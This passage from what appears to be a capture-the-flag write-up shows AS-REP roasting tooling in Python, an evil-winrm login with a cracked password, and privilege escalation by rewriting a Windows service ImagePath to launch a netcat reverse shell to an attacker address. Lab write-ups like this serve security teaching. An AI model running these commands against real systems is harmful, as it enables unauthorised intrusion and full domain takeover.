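    return "DONT_REQ_PREAUTH" in flags and "ACCOUNTDISABLE" not in flags


def parse_asrep(line):
    """Split a $krb5asrep$ line into fields and attach the hashcat mode; None if the line is not one."""
    m = ASREP_RE.match(line.strip())
    if not m:
        return None
    fields = m.groupdict()
    fields["etype"] = int(fields["etype"])
    fields["hashcat_mode"] = ASREP_MODES.get(fields["etype"])
    return fields


if __name__ == "__main__":
    print(sorted(decode_uac("0x410200")), asrep_roastable("0x410200"))
    info = parse_asrep(SAMPLE_ASREP)
    print(info["user"], info["realm"], info["etype"], "-> hashcat -m", info["hashcat_mode"])
```

0x410200 decodes to NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD and DONT_REQ_PREAUTH, which is exactly the Set-ADAccountControl change plus what the account already had. Defenders can run the same decode over an LDAP export: any enabled account with DONT_REQ_PREAUTH set is roastable by anyone who can talk to the KDC.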

which gives us jorden's password:

evil-winrm.rb -i 10.10.10.179 -u jorden -p rainforest786
*Evil-WinRM* PS C:\Users\jorden\Desktop> whoami /all

USER INFORMATION
----------------

User Name       SID
=============== =============================================
megacorp\jorden S-1-5-21-3167813660-1240564177-918740779-3110


GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                           Attributes
========================================== ================ ============================================= ==================================================
Everyone                                   Well-known group S-1-1-0                                       Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Server Operators                   Alias            S-1-5-32-549                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                  Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                      Mandatory group, Enabled by default, Enabled group
MEGACORP\Developers                        Group            S-1-5-21-3167813660-1240564177-918740779-3119 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10                                   Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                         State
============================= =================================== =======
SeMachineAccountPrivilege     Add workstations to domain          Enabled
SeSystemtimePrivilege         Change the system time              Enabled
SeBackupPrivilege             Back up files and directories       Enabled
SeRestorePrivilege            Restore files and directories       Enabled
SeShutdownPrivilege           Shut down the system                Enabled
SeChangeNotifyPrivilege       Bypass traverse checking            Enabled
SeRemoteShutdownPrivilege     Force shutdown from a remote system Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set      Enabled
SeTimeZonePrivilege           Change the time zone                Enabled

jorden is a member of Server Operators (see the groups above), and after uploading WinPEAS we learn of a service, SensorDataService, whose ImagePath we can rewrite. We point it at our netcat binary and start the service; the callback runs in the service's own security context, not jorden's:

REG add HKLM\System\CurrentControlSet\Services\SensorDataService /v ImagePath /t REG_EXPAND_SZ /d "cmd.exe /c C:\tmp\nc.exe 10.10.14.41 9091 -e cmd.exe" /f

sc.exe start SensorDataService

and the shell that comes back has administrative privileges:

C:\Users\Administrator\Desktop>type root.txt
type root.txt
a3f83dba0c0a***6d88323e82edef
